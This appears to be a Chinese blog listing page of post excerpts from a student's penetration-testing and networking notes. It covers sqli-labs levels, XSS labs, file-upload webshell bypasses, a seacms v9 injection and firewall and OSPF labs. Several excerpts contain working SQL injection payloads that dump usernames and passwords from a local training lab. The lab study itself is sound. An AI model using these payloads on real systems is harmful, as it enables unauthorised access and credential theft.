自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(43)
  • 收藏
  • 关注

原创 渗透部分总结

Linux 系统上安装 Docker 引擎并启动服务:# 安装Docker引擎 curl -fsSL https://get.docker.com | sh通过 curl 下载并执行 Docker 官方的安装脚本,这会自动配置 Docker 仓库并安装最新版本的 Docker 引擎。启动 Docker 服务,并设置为开机自启动,确保系统重启后 Docker 能自动运行Vulhub是一个预置大量漏洞环境的Docker镜像集合。首先通过git clone。

2025-07-22 18:48:07 714

原创 XSS(跨站脚本)

一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。

2025-07-22 17:50:51 369

原创 XSS漏洞靶场

虽然在 <h2> 标签中使用了 htmlspecialchars 对输出进行转义,但在 <input> 标签的 value 属性中,使用的是经过 str_replace 处理后的 $str3,没有再次进行全面的转义,这就给攻击者留下了可乘之机。在上述代码里,$str 是从 $_GET["keyword"] 获取的用户输入,在 <input> 标签的 value 属性中直接使用了 $str,而没有进行合适的转义。当页面加载时,浏览器会执行注入的 JavaScript 代码,从而实现攻击目的。

2025-03-22 01:35:31 817

原创 SQL注入第7关

拥有root权限,secure_file_priv值为空,确定路径。得到aaa.php文件,获取到 PHP 环境信息。存在注入,需要使用单引号闭合。打开文件aaa.php。

2025-03-17 17:20:09 311

原创 SQL注入第6关

查询users表中的字段:http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(concat_ws(0x7e,username,password)) from security.users),0x7e))--+查询数据库列数:http://127.0.0.1/sqli-labs-master/Less-6/?

2025-03-17 16:41:00 171

原创 SQL注入第五关

id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e))--+获取数据库中的表:http://127.0.0.1/sqli-labs-master/Less-5/?列数为4时出现报错,为3时没有报错,猜测列数为3。

2025-03-17 16:30:04 320

原创 SQL注入第四关

查询表users中的字段:http://127.0.0.1/sqli-labs-master/less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security' --+查询回显位置:http://127.0.0.1/sqli-labs-master/less-4/?

2025-03-17 11:40:32 370

原创 SQL注入第三关

id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security' --+查询username,password:http://127.0.0.1/sqli-labs-master/less-3/?查询回显位置:http://127.0.0.1/sqli-labs-master/less-3/?

2025-03-17 11:25:11 288

原创 sql注入第二关

输入一个id输入?id=1'查看是否存在字符型注入题目为数字型注入所以不能使用'查询列数 http://127.0.0.1/sqli-labs-master/less-2/?id=1 order by 3--+列数为3查询回显位置:http://127.0.0.1/sqli-labs-master/less-2/?id=-1 union select 1,2,3 --+2,3位置回显查询数据库名称:http://127.0.0.1/sqli-labs-master/less-2/?id=-1 union s

2025-03-17 10:56:37 241

原创 文件上传漏洞

在上述配置中,FilesMatch表示匹配4.png的文件,当该文件名匹配成功后,SetHandler表示将该文件作为PHP类型的文件来进行处置。复制文件上传的路径,请求GET /upload/upload/webshell.php?分析源码,黑名单包括了几乎所有php后缀文件,但是并没有屏蔽后缀为.htaccess的文件上传。分析源码,黑名单包括了几乎所有php后缀文件,但是并没有屏蔽后缀为.htaccess的文件上传。上传png后缀的webshell,代理抓包,修改上传的文件后缀 (推荐);

2025-03-11 16:31:51 571

原创 sql注入靶场第一关

id=-1'union select 1,(select group_concat(table _name) from information schema_tables where table _schema ='security'),3--+进行所有表名的查询。id=-1'union select 1,group_concat(concat ws(0x3a,username,password),3 from security.users --+查询users表中的username和password。

2025-03-11 08:23:21 288

原创 seacmsv9注入管理员账号密码+orderby+limit

①数据依赖性:updatexml函数的报错注入通常是通过构造恶意的XPath表达式,使其产生错误并泄露部分信息,如果注入点的逻辑要求从sea_comment表中读取数据以构建这个恶意的XPath表达式,那么当sea_comment为空时,就无法构造出有效的报错语句;海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,采用的是 php5.X+mysql 的架构,seacmsv9漏洞文件:./comment/api/index.php,漏洞参数:$rlist。

2025-03-10 17:07:19 692

原创 sql注入

盲注是一种 SQL 注入攻击的类型,攻击者在注入时,无法直接从数据库获取到输出结果,但可以通过发送特定的 SQL 语句,根据数据库的响应来推断数据库中的信息,例如:有响应时间代表输入存在,没有则代表不存在。利用输入验证的缺失或不严格,将恶意 SQL 代码混入正常的 SQL 语句执行流程中,从而让数据库执行非预期的操作,以获取对数据库的非法访问和控制权限。建一个包括用户名和密码的数据表,使用时间盲注函数sleep,对用户名以及密码从0-9,a-z进行时间盲注,如果存在响应时间代表正确。

2025-03-09 14:26:02 243

原创 蓝队培训题

主动:.\xray_windows_amd64.exe webscan --basic-crawler http://example.com --html-output report.html。被动: .\xray_windows_amd64.exe webscan --listen 127.0.0.1:8989。使用服务器下载goby,将Windows上的goby扫描任务转发到Linux上。安装xray,并使用主动扫描和被动扫描进行扫描一个自建网站。搞清楚主动扫描和被动扫描的区别。

2025-03-05 19:22:13 363

原创 蓝队培训题

4、在信息收集的时候,我们通常要收集哪些信息,并简单描述一些收集方法?3、绕过cdn找到真实IP的方法有哪些,这些方法的原理是什么?收集端口,使用nmap进行端口扫描,扫描目标ip。使用企查查输入单位名称进行信息查询收集,或工信部。5、给你一个单位名称,如何开展信息收集?6、给你一个ip地址,如何开展信息收集?7、给你一个域名,如何开展信息收集?80(http) 攻击:SQL注入。8、内网中我们需要做哪些信息收集?53(dns) 攻击:dns劫持。收集ip,使用ping域名的方式。工信部输入域名查询信息。

2025-03-03 16:36:30 130

原创 时间盲注,boolen盲注

是SQL注入攻击的一种类型,它利用数据库执行时间的差异来获取信息。当应用程序对用户输入过滤不严格,攻击者就可以通过注入特制的SQL语句,使数据库根据条件判断来延迟响应时间,以此来推断数据库中的数据信息,而不会在页面上直接显示注入的结果。也是SQL注入攻击的一种方式。它通过向目标服务器注入特定的SQL语句,根据服务器返回的布尔值信息来判断注入语句的执行结果,以此逐步获取数据库中的敏感信息,同样不会在页面上直接显示注入结果。

2025-02-17 18:10:51 251

原创 Web作业

【代码】Web作业。

2025-01-10 09:05:38 217

原创 【防火墙实验】

12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。15,移动链路采用的是100M的带宽,要求游客区用户仅能占用50M,并且基于在线地址进行动态均分。

2024-07-20 23:33:03 385

原创 防火墙NAT智能选举综合实验

9,多出口环境基于带宽比例进行选路,但是,办公区中10.0.2.10该设备只能通过电信的链路访问互联网。10,分公司内部的客户端可以通过域名访问到内部的服务器,公网设备也可以通过域名访问到分公司内部服务器;7,办公区设备可以通过电信链路和移动链路上网(多对多的NAT,并且需要保留一个公网IP不能用来转换)8,分公司设备可以通过总公司的移动链路和电信链路访问到Dmz区的http服务器。11,游客区仅能通过移动链路访问互联网。给FW2进行配置要与Clound连通。将其他需要配置ip地址的配置完毕。

2024-07-14 15:34:30 194

原创 ENSP防火墙安全策略和用户管理

4办公区分为市场部和研发部,研发部地址固定,访问DMZ区使用匿名认证,市场部需要用户绑定ip地址,访问DMZ区使用免认证;游客区人员不固定,不允许访问DMz区和生产区,统一使用Guest用户登录密码Admin@123,游客仅有访问公司门户网站和上网的权限,门户网站地址:10.0.3.10。3办公区设备10.0.2.10不允许访问DMZ的ETP服务器和HTP服务器,仅能ping通10.0.3.10。2生产区不允许访问互联网,办公区和游客区允许。vlan2对应生产区,vlan3对应办公区。

2024-07-11 15:04:22 506

原创 DNS解析

root@node1 ~]#nmcli c modify ens33 ipv4.method manual ipv4.addresses 192.168.186.136/24 ipv4.gateway 192.168.186.2 ipv4.dns 192.168.186.134 # 注意,此处dns改为服务端的IP地址,后续就不用再单独修改。连接已成功激活(D-Bus 活动路径:/org/freedesktop/NetworkManager/ActiveConnection/2)

2024-04-13 00:13:11 980 1

原创 【无标题】

在 C:\Windows\System32\drivers\etc\hosts 文件中进行DNS映射添加 192.168.48.130 www.openlab.comserver {listen 80;

2024-04-13 00:03:19 469

原创 【无标题】OSPF综合实验

172.16.128.0/24 --- P2P骨干。172.16.32.0/24 --- P2P骨干。172.16.64.0/24 --- P2P骨干。172.16.96.0/24 --- P2P骨干。172.16.129.0/24 --- MA骨干。172.16.0.0/24 --- P2P骨干。172.16.33.0/24 --- MA骨干。172.16.65.0/24 --- MA骨干。172.16.1.0/24 --- MA骨干。*给R3中心开启伪广播。

2024-02-23 08:39:00 882

原创 OSPF环境下的MGRE实验

R1:R2:R3:R4:R5:R6:

2024-01-30 22:52:28 1002 1

原创 rip环境下的MGRE实验

R1:R2:R3:R4:R5:认证方:[ISP]aaa[ISP-aaa]q被认证方:主:被:HDLC封装:R3[Y/N]:yISP[Y/N]:yGRE:全网可达:[R1]rip 1[R2]rip 1[R3]rip[R4]rip。

2024-01-27 10:27:00 915 1

原创 hcia 复习实验

给R1-R5分配IP地址:R1,R2,R4环回:

2024-01-23 22:12:14 402 1

原创 【无标题】

只针对目录有效,在具有SBit权限的目录下,如果该用户在该目录下拥有wx权限,则当用户在该目录下创建文件或者目录的时候,只有文件拥有者和root用户才有权限去删除里面的东西。命令类似 cat ,不过会以一页一页的形式显示,更方便使用者逐页阅读,而最基本的指令就是按空白键(space)就往下一页显示,按 b 键就会往回(back)一页显示。文件:如果SGID设置在二进制文件上面,则不论用户是谁,都可以在执行该程序的时候程序的所属组将变成该文件的所属组。可用于查看文件的开头部分的内容,默认显示前十行。

2023-11-16 13:24:44 91

原创 RHCSA笔记整理

如果touch一个已经存在的文件,则会把它除了创建时间之外的剩下时间全部进行修改。复制普通文件和目录文件到/root/hostname,源文件依旧存在。所有的文件的路径都从/根目录开始,任何字符后面的/都表示分隔符。目录重新挂载已经挂载的设备,并以其他的权限挂载,这里我们需要。如果touch一个不存在的文件,则会创建该文件。改变时间:用来标记文件元数据发生变化的时候。命令改变系统的根目录的位置,将其改到。相对路径:不是从根目录开始的路径。该文件的所属组的对该文件的权限。访问时间:用户读取文件内容的时间。

2023-11-02 16:36:32 123 1

原创 作业2222

2023-10-29 17:33:37 96 1

原创 【无标题】

2023-08-20 16:16:24 77 1

原创 数据库作业分享

建立一张表: 表里面有多个字段,每一个字段对应一种数据类型。注意:表名,字段名都要起的有意义。

2023-08-20 16:07:59 86 1

原创 python爬虫作业

workbook = xlwt.Workbook(encoding="utf-8") # 创建workbook对象。pat = re.compile(r"◎译  名(.*)\n")pat = re.compile(r"◎片  名(.*)\n")pat = re.compile(r"◎年  代(.*)\n")pat = re.compile(r"◎类  别(.*)\n")print("◎年  代", n)print("◎类  别", n)print("◎译  名",n)print("◎片  名",n)

2023-08-03 10:43:40 652

原创 tcp udp

12。

2023-07-30 08:31:24 79 1

原创 python作业

1.2.

2023-07-27 11:19:20 124 1

原创 python练习题

2023-07-21 07:43:39 76 1

原创 python小作业

输入两个正整数,并求出它们的最大公约数和最小公倍数。的所有闰年,条件是四年一闰;百年不闰,四百年再闰。

2023-07-20 19:16:18 335 1

原创 OSPF综合实验

划分(192.168.1.0/24):骨干:r1:r2:r3:r4:r1书写ospf:r2书写ospf:r3书写ospf:r4书写ospf:r4书写缺省:手工认证:避免环路(空接口):

2023-07-05 03:30:29 73 1

原创 【无标题】

1.通过给接口配ip地址,书写静态路由使全网连通。

2023-07-05 02:21:28 71 1

原创 vlan 综合实验

路由器配置:(通过DHCP自动获取pc的IP地址)

2023-06-27 17:55:51 93 1

原创 RIP协议实验

用户(r1):192.168.1.01 000000。用户(r2):192.168.1.10 000000。环回: 192.168.1.01 0 00000。环回: 192.168.1.01 1 00000。环回: 192.168.1.10 1 00000。环回:192.168.1.10 0 00000。骨干:192.168.1.00 000000。

2023-06-27 17:17:15 113 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除